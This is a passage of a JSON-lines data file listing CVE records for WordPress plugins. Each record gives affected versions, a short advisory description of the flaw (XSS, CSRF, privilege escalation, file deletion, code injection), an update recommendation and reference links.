version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231363%40contact-forms&new=3231363%40contact-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231363%40contact-forms&new=3231363%40contact-forms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232168%40contact-forms&new=3232168%40contact-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232168%40contact-forms&new=3232168%40contact-forms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/695df547-f068-4ac1-926f-80dbf75632dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/695df547-f068-4ac1-926f-80dbf75632dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36666","slug":"directory-pro","versionEndExcluding":"1.9.5","description":"The directory-pro WordPress plugin before 1.9.5, final-user-wp-frontend-user-profiles WordPress plugin before 1.2.2, producer-retailer WordPress plugin through TODO, photographer-directory WordPress plugin before 1.0.9, real-estate-pro WordPress plugin before 1.7.1, institutions-directory WordPress plugin before 1.3.1, lawyer-directory WordPress plugin before 1.2.9, doctor-listing WordPress plugin before 1.3.6, Hotel Listing WordPress plugin before 1.3.7, fitness-trainer WordPress plugin before 1.4.1, wp-membership WordPress plugin before 1.5.7, sold by the same developer (e-plugins), do not implementing any security measures in some AJAX calls. For example in the file plugin.php, the function iv_directories_update_profile_setting() uses update_user_meta with any data provided by the ajax call, which can be used to give the logged in user admin capabilities. Since the plugins allow user registration via a custom form (even if the blog does not allow users to register) it makes any site using it vulnerable.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d079cb16-ead5-4bc8-b0b8-4a4dc2a54c96\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d079cb16-ead5-4bc8-b0b8-4a4dc2a54c96\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/user\\\/e-plugins\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/user\\\/e-plugins\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10770","slug":"envo-extra","versionImpact":"1.9.3","versionEndExcluding":"1.9.4","description":"The Envo Extra plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.3 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08b0f5e0-f68a-4fea-9d62-468956012a6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08b0f5e0-f68a-4fea-9d62-468956012a6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182181%40envo-extra&new=3182181%40envo-extra&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182181%40envo-extra&new=3182181%40envo-extra&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13306","slug":"gmap-embed","versionImpact":"1.9.3","versionEndExcluding":"1.9.4","description":"The Maps Plugin using Google Maps for WordPress  WordPress plugin before 1.9.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec3096f2-60fd-4654-9e95-5cf4b20b2990\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec3096f2-60fd-4654-9e95-5cf4b20b2990\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13208","slug":"gmap-embed","versionImpact":"1.9.3","versionEndExcluding":"1.9.4","description":"The Maps Plugin using Google Maps for WordPress  WordPress plugin before 1.9.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f86d4f64-208f-407f-8d2c-a89b5e0ac777\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f86d4f64-208f-407f-8d2c-a89b5e0ac777\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7809","slug":"streamweasels-twitch-integration","versionImpact":"1.9.3","versionEndExcluding":"1.9.4","description":"The StreamWeasels Twitch Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'data-uuid' attribute in all versions up to, and including, 1.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-twitch-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-public.js#L1349\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-twitch-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-public.js#L1349\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eed5b1ea-213c-4a37-b357-8d058af86d38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eed5b1ea-213c-4a37-b357-8d058af86d38?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1121","slug":"advanced-forms","versionImpact":"1.9.3.2","versionEndExcluding":"1.9.3.3","description":"The Advanced Forms for ACF plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_json_file() function in all versions up to, and including, 1.9.3.2. This makes it possible for unauthenticated attackers to export form settings.","recommendation":"Update to version 1.9.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4088","slug":"attire-blocks","versionImpact":"1.9.2","versionEndExcluding":"1.9.3","description":"The Gutenberg Blocks and Page Layouts \u2013 Attire Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disable_fe_assets function in all versions up to, and including, 1.9.2. This makes it possible for authenticated attackers, with subscriber access or above, to change the plugin's settings. Additionally, no nonce check is performed resulting in a CSRF vulnerability.","recommendation":"Update to version 1.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef47feb7-76fd-470d-ba48-55ba3c323c6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef47feb7-76fd-470d-ba48-55ba3c323c6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085600\\\/attire-blocks\\\/trunk\\\/admin\\\/AttireBlocksSettings.php?old=2996841&old_path=attire-blocks%2Ftrunk%2Fadmin%2FAttireBlocksSettings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085600\\\/attire-blocks\\\/trunk\\\/admin\\\/AttireBlocksSettings.php?old=2996841&old_path=attire-blocks%2Ftrunk%2Fadmin%2FAttireBlocksSettings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6505","slug":"prime-mover","versionImpact":"1.9.2","versionEndExcluding":"1.9.3","description":"The Migrate WordPress Website & Backups WordPress plugin before 1.9.3 does not prevent directory listing in sensitive directories containing export files.","recommendation":"Update to version 1.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eca6f099-6af0-4f42-aade-ab61dd792629\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eca6f099-6af0-4f42-aade-ab61dd792629\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6885","slug":"maxi-blocks","versionImpact":"1.9.2","versionEndExcluding":"1.9.3","description":"The MaxiBlocks: 2200+ Patterns, 190 Pages, 14.2K Icons & 100 Styles plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the maxi_remove_custom_image_size and maxi_add_custom_image_size functions in all versions up to, and including, 1.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 1.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/249b08c5-7429-4690-9f08-fc3f049aa62c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/249b08c5-7429-4690-9f08-fc3f049aa62c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/core\\\/class-maxi-image-crop.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/core\\\/class-maxi-image-crop.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/core\\\/class-maxi-image-crop.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/core\\\/class-maxi-image-crop.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/plugin.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/plugin.php#L221\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10647","slug":"ws-form","versionImpact":"1.9.244","versionEndExcluding":"1.9.245","description":"The WS Form LITE \u2013 Drag & Drop Contact Form Builder for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.244. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.245, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cab527f-bd67-4b67-8133-f085098d63dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cab527f-bd67-4b67-8133-f085098d63dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179725\\\/ws-form\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179725\\\/ws-form\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1505","slug":"academy","versionImpact":"1.9.19","versionEndExcluding":"1.9.20","description":"The Academy LMS \u2013 eLearning and online course solution for WordPress plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.9.19. This is due to plugin allowing arbitrary user meta updates through the saved_user_info() function. This makes it possible for authenticated attackers, with minimal permissions such as students, to elevate their user role to that of an administrator.","recommendation":"Update to version 1.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b150f90a-ccb7-4c19-a4b3-eaf9ec264ba8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b150f90a-ccb7-4c19-a4b3-eaf9ec264ba8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037880\\\/academy#file473\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037880\\\/academy#file473\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11223","slug":"wpforms-lite","versionImpact":"1.9.2.2","versionEndExcluding":"1.9.2.3","description":"The WPForms  WordPress plugin before 1.9.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82989909-9745-4c9a-abc7-c1adf8c2b047\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82989909-9745-4c9a-abc7-c1adf8c2b047\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10796","slug":"if-so","versionImpact":"1.9.2.1","versionEndExcluding":"1.9.2.2","description":"The If-So Dynamic Content Personalization plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.2.1 via the 'ifso-show-post' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.","recommendation":"Update to version 1.9.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188093\\\/if-so\\\/trunk\\\/extensions\\\/ifso-extended-shortcodes\\\/extended-shortcodes.php?old=3157276&old_path=if-so%2Ftrunk%2Fextensions%2Fifso-extended-shortcodes%2Fextended-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188093\\\/if-so\\\/trunk\\\/extensions\\\/ifso-extended-shortcodes\\\/extended-shortcodes.php?old=3157276&old_path=if-so%2Ftrunk%2Fextensions%2Fifso-extended-shortcodes%2Fextended-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66363035-c09f-4b41-b9fe-2e2bdd851f41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66363035-c09f-4b41-b9fe-2e2bdd851f41?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11205","slug":"wpforms-lite","versionImpact":"1.9.2.1","versionEndExcluding":"1.9.2.2","description":"The WPForms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wpforms_is_admin_page' function in versions starting from 1.8.4 up to, and including, 1.9.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to refund payments and cancel subscriptions.","recommendation":"Update to version 1.9.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/includes\\\/functions\\\/checks.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/includes\\\/functions\\\/checks.php#L191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/src\\\/Integrations\\\/Stripe\\\/Admin\\\/Payments\\\/SingleActionsHandler.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/src\\\/Integrations\\\/Stripe\\\/Admin\\\/Payments\\\/SingleActionsHandler.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/src\\\/Integrations\\\/Stripe\\\/Admin\\\/Payments\\\/SingleActionsHandler.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/src\\\/Integrations\\\/Stripe\\\/Admin\\\/Payments\\\/SingleActionsHandler.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191229\\\/wpforms-lite#file2128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191229\\\/wpforms-lite#file2128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66898509-a93c-4dc3-bf01-1743daaa0ff1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66898509-a93c-4dc3-bf01-1743daaa0ff1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10593","slug":"wpforms-lite","versionImpact":"1.9.1.6","versionEndExcluding":"1.9.2.1","description":"The WPForms \u2013 Easy Form Builder for WordPress \u2013 Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.1.6. This is due to missing or incorrect nonce validation on the process_admin_ui function. This makes it possible for unauthenticated attackers to delete WPForm logs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1ea80a-a1ce-4964-8dde-f3ed2df5537c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1ea80a-a1ce-4964-8dde-f3ed2df5537c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.1.6\\\/src\\\/Admin\\\/Tools\\\/Views\\\/Logs.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.1.6\\\/src\\\/Admin\\\/Tools\\\/Views\\\/Logs.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.1.6\\\/src\\\/Logger\\\/ListTable.php#L394\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.1.6\\\/src\\\/Logger\\\/ListTable.php#L394\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6252","slug":"qi-addons-for-elementor","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 1.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/main.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/main.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3318746%40qi-addons-for-elementor%2Ftrunk&old=3308494%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3318746%40qi-addons-for-elementor%2Ftrunk&old=3308494%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ef82a52-0a32-4dc4-b027-3d2098549404?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ef82a52-0a32-4dc4-b027-3d2098549404?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4261","slug":"lead-form-builder","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The Responsive Contact Form Builder & Lead Generation Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/858d8641-7455-47c2-9639-480ce4ec3540?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/858d8641-7455-47c2-9639-480ce4ec3540?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/block\\\/app.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/block\\\/app.php#L24\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9232","slug":"download-plugins-dashboard","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The Download Plugins and Themes in ZIP from Dashboard plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3ea04ba-b609-49cd-aae8-68f5b51df154?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3ea04ba-b609-49cd-aae8-68f5b51df154?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugins-dashboard\\\/tags\\\/1.9.1\\\/includes\\\/settings\\\/class-alg-download-plugins-settings.php#L336\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugins-dashboard\\\/tags\\\/1.9.1\\\/includes\\\/settings\\\/class-alg-download-plugins-settings.php#L336\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165289\\\/#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165289\\\/#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7425","slug":"wp-all-export-pro","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The WP ALL Export Pro plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to improper user input validation and sanitization in all versions up to, and including, 1.9.1. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9205896-487d-4b8f-84cf-7ba16e1205e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9205896-487d-4b8f-84cf-7ba16e1205e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\\\/upgrade-to-wp-all-export-pro\\\/\",\"name\":\"https:\\\/\\\/www.wpallimport.com\\\/upgrade-to-wp-all-export-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7419","slug":"wp-all-export-pro","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The WP ALL Export Pro plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.9.1 via the custom export fields. This is due to the missing input validation and sanitization of user-supplied data. This makes it possible for unauthenticated attackers to inject arbitrary PHP code into form fields that get executed on the server during the export, potentially leading to a complete site compromise. \r\nAs a prerequisite, the custom export field should include fields containing user-supplied data.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40b57370-4fd7-4316-9e99-a3f1d34616e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40b57370-4fd7-4316-9e99-a3f1d34616e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\\\/upgrade-to-wp-all-export-pro\\\/\",\"name\":\"https:\\\/\\\/www.wpallimport.com\\\/upgrade-to-wp-all-export-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10866","slug":"export-import-menus","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The Export Import Menus plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the dsp_export_import_menus() function in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to export menu data and settings.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213801%40export-import-menus&new=3213801%40export-import-menus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213801%40export-import-menus&new=3213801%40export-import-menus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08beb583-096d-453c-9690-b46e410afb1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08beb583-096d-453c-9690-b46e410afb1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
